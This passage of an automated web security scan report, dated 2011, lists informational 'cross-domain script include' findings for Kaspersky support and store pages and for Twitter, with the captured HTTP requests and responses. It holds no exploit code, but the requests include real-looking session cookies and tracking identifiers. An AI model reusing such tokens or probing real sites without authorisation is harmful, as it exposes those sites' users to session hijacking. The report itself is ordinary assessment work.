Cookie: SESSdede027f997e7b165588bf3c431a00ec=q25voncnf657rngjhpsai5d5p6; has_js=1; s_cc=true; gpv_pageName=Support%20%7C%20Corporate%20Support%20%7C%20Workstations%20%7C%20Anti-Virus%20for%20Windows%20Workstations%20R2%20MP4; s_SupportDivison=Corporate%20Support; s_nr=1315144674455-New; s_sq=%5B%5BB%5D%5D; __utma=38548641.275004050.1315144606.1315144606.1315144606.1; __utmb=38548641.4.10.1315144606; __utmc=38548641; __utmz=38548641.1315144606.1.1.utmcsr=usa.kaspersky.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/contact-us; __utmv=38548641.anonymous%20user|1=User%20roles=anonymous%20user=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:58 GMT
Server: Apache
Last-Modified: Sun, 04 Sep 2011 02:22:54 GMT
ETag: "2921-4ac14459bbb80"
Accept-Ranges: bytes
Content-Length: 52051
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://usa.kaspersky.com/sites/all/shared_files/omniture/s_code.js"></script>
...[SNIP]...

16.38. http://support.kasperskyamericas.com/search/node/xss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kasperskyamericas.com
Path:	/search/node/xss

Issue detail

The response dynamically includes the following script from another domain:

http://usa.kaspersky.com/sites/all/shared_files/omniture/s_code.js

Request

GET /search/node/xss HTTP/1.1
Host: support.kasperskyamericas.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/anti-virus-6-r2-mp4-windows-workstations
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSdede027f997e7b165588bf3c431a00ec=q25voncnf657rngjhpsai5d5p6; has_js=1; s_cc=true; __utma=38548641.275004050.1315144606.1315144606.1315144606.1; __utmb=38548641.12.10.1315144606; __utmc=38548641; __utmz=38548641.1315144606.1.1.utmcsr=usa.kaspersky.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/contact-us; __utmv=38548641.anonymous%20user|1=User%20roles=anonymous%20user=1; gpv_pageName=Support%20%7C%20Corporate%20Support%20%7C%20Workstations%20%7C%20Anti-Virus%20for%20Windows%20Workstations%20R2%20MP4; s_SupportDivison=Corporate%20Support; s_nr=1315145039287-New; s_sq=kaspersky-usa%3D%2526pid%253DSupport%252520%25257C%252520Corporate%252520Support%252520%25257C%252520Workstations%252520%25257C%252520Anti-Virus%252520for%252520Windows%252520Workstations%252520R2%252520MP4%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fsupport.kasperskyamericas.com%25252Fsites%25252Fdefault%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:16:42 GMT
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:03:28 GMT
ETag: "19e7-4ac1e0f07ac00"
Accept-Ranges: bytes
Content-Length: 25794
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://usa.kaspersky.com/sites/all/shared_files/omniture/s_code.js"></script>
...[SNIP]...

16.39. http://twitter.com/kaspersky previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/kaspersky

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1314996488/javascripts/dismissable.js?1314639322
http://a1.twimg.com/a/1314996488/javascripts/lib/gears_init.js?1314639322
http://a1.twimg.com/a/1314996488/javascripts/lib/jquery.tipsy.min.js?1314639322
http://a2.twimg.com/a/1314996488/javascripts/api.js?1314639322
http://a2.twimg.com/a/1314996488/javascripts/geov1.js?1314639322
http://a2.twimg.com/a/1314996488/javascripts/lib/mustache.js?1314639322
http://a3.twimg.com/a/1314996488/javascripts/twitter.js?1314639322
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /kaspersky HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:04:09 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315145049-78085-23001
ETag: "a954b13c9807e2daa4f97abdda45a1eb"
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 04 Sep 2011 14:04:09 GMT
X-Runtime: 0.01279
Content-Type: text/html; charset=utf-8
Content-Length: 53217
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 41a2d015b2d02738e3816156b737becab2a37596
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlMzY4MTAzMzIwYTU0MDNmOWJkMThiMGViOWU3OTE3%250ANWE6DnJldHVybl90byIcaHR0cDovL3R3aXR0ZXIuY29tL2hvbWU6FWluX25l%250Ad191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIyZFxNDIBIgpmbGFzaElDOidB%250AY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA%250AOgdpZCIlMjg5ZWYzNjJiOTliOTU2ZGQwYjI1ODE3YTUwMGNjODU%253D--1d9639579085ed1ab4850fecaa00cb41fafbd9ac; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1314996488/javascripts/twitter.js?1314639322" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1314996488/javascripts/lib/jquery.tipsy.min.js?1314639322" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1314996488/javascripts/lib/gears_init.js?1314639322" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1314996488/javascripts/lib/mustache.js?1314639322" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1314996488/javascripts/geov1.js?1314639322" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1314996488/javascripts/api.js?1314639322" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1314996488/javascripts/lib/mustache.js?1314639322" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1314996488/javascripts/dismissable.js?1314639322" type="text/javascript"></script>
...[SNIP]...

16.40. http://twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1314996488/javascripts/widgets/widget.js?1314639322
http://a3.twimg.com/a/1314996488/javascripts/fronts.js
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET /search HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:04:09 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315145049-21758-35204
ETag: "3467c9de464da2d0541e2d0e5221854a"
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 04 Sep 2011 14:04:09 GMT
X-Runtime: 0.02574
Content-Type: text/html; charset=utf-8
Content-Length: 20351
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 930fd3922666df2d744bdd129c8c4f862385bc95
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlMzY4MTAzMzIwYTU0MDNmOWJkMThiMGViOWU3OTE3%250ANWE6DnJldHVybl90byIcaHR0cDovL3R3aXR0ZXIuY29tL2hvbWU6FWluX25l%250Ad191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIyZFxNDIBIgpmbGFzaElDOidB%250AY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA%250AOgdpZCIlMjg5ZWYzNjJiOTliOTU2ZGQwYjI1ODE3YTUwMGNjODU%253D--1d9639579085ed1ab4850fecaa00cb41fafbd9ac; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
</h2>

<script src="http://a0.twimg.com/a/1314996488/javascripts/widgets/widget.js?1314639322" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1314996488/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

16.41. http://usa.kaspersky.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

Response

16.42. http://usa.kaspersky.com/about-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us

Issue detail

The response dynamically includes the following script from another domain:

http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /about-us HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/mobile-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20Mobile%20Security; s_nr=1315139135058-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520Mobile%252520Security%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:37:32 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139852"
Content-Type: text/html; charset=utf-8
Content-Length: 33945
Date: Sun, 04 Sep 2011 12:37:41 GMT
X-Varnish: 1163074516
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...

16.43. http://usa.kaspersky.com/about-us/contact-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/contact-us

Issue detail

The response dynamically includes the following script from another domain:

http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /about-us/contact-us HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/about-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; ev5=far%2Bhelp%2Bvirus; op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=About%20Us%20%7C%20Why%20Kaspersky; s_nr=1315144592471-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DAbout%252520Us%252520%25257C%252520Why%252520Kaspersky%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fabout-us%25252Fcontact-us%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:55:55 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315144555"
Content-Type: text/html; charset=utf-8
Content-Length: 41877
Date: Sun, 04 Sep 2011 13:55:57 GMT
X-Varnish: 1163222238
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...

16.44. http://usa.kaspersky.com/about-us/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/about-us/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /about-us/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:04:27 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145067"
Content-Type: text/html; charset=utf-8
Content-Length: 38389
Date: Sun, 04 Sep 2011 14:04:40 GMT
X-Varnish: 1163242022
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...

16.45. http://usa.kaspersky.com/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:04:17 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145057"
Content-Type: text/html; charset=utf-8
Content-Length: 37058
Date: Sun, 04 Sep 2011 14:04:24 GMT
X-Varnish: 1163241500
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...

16.46. http://usa.kaspersky.com/node/12354/lightbox2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/12354/lightbox2

Issue detail

The response dynamically includes the following scripts from other domains:

http://drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js
http://drh.img.digitalriver.com/DRHM/Storefront/Site/kasperus/cm/multimedia/OT_Files/kaspersky-hosted/kasperus_globalTrial.js
http://drh.img.digitalriver.com/DRHM/Storefront/Site/kasperus/cm/multimedia/OT_Files/kaspersky-hosted/kasperus_kaspersky_store_pure_contentBody.js
http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /node/12354/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; ev5=far%2Bhelp%2Bvirus; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.9.9.1315139091566; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Store%20%7C%20Home%20Users%20%7C%20Kaspersky%20Store; s_nr=1315139100971-New; s_sq=kaspersky-usa%3D%2526pid%253DStore%252520%25257C%252520Home%252520Users%252520%25257C%252520Kaspersky%252520Store%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257B%252524('%252523pure-users-3y-prices').show()%25253B%252524('%252523pure-users-2y-prices').hide()%25253B%252524('%252523pure-%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:31:46 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139506"
Content-Type: text/html; charset=utf-8
Content-Length: 20165
Date: Sun, 04 Sep 2011 12:32:26 GMT
X-Varnish: 1163065253
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...
</script>

<script src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js"></script>
<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/kasperus/cm/multimedia/OT_Files/kaspersky-hosted/kasperus_globalTrial.js"></script>
<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/kasperus/cm/multimedia/OT_Files/kaspersky-hosted/kasperus_kaspersky_store_pure_contentBody.js"></script>
...[SNIP]...

16.47. http://usa.kaspersky.com/node/17007 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/17007

Issue detail

The response dynamically includes the following script from another domain:

http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /node/17007 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:27:32 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139252"
Content-Type: text/html; charset=utf-8
Content-Length: 36720
Date: Sun, 04 Sep 2011 12:27:44 GMT
X-Varnish: 1163058525
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...

16.48. http://usa.kaspersky.com/node/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/node/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /node/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:04:13 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145053"
Content-Type: text/html; charset=utf-8
Content-Length: 30403
Date: Sun, 04 Sep 2011 14:04:16 GMT
X-Varnish: 1163241251
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...

16.49. http://usa.kaspersky.com/products-services/home-computer-security/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /products-services/home-computer-security/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:04:13 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145053"
Content-Type: text/html; charset=utf-8
Content-Length: 40945
Date: Sun, 04 Sep 2011 14:04:16 GMT
X-Varnish: 1163241206
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...

16.50. http://usa.kaspersky.com/products-services/home-computer-security/internet-security previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/internet-security

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /products-services/home-computer-security/internet-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:26:15 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139175"
Content-Type: text/html; charset=utf-8
Content-Length: 109002
Date: Sun, 04 Sep 2011 12:26:43 GMT
X-Varnish: 1163056581
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...


<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

16.51. http://usa.kaspersky.com/products-services/home-computer-security/mobile-security previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/mobile-security

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js

Request

GET /products-services/home-computer-security/mobile-security HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
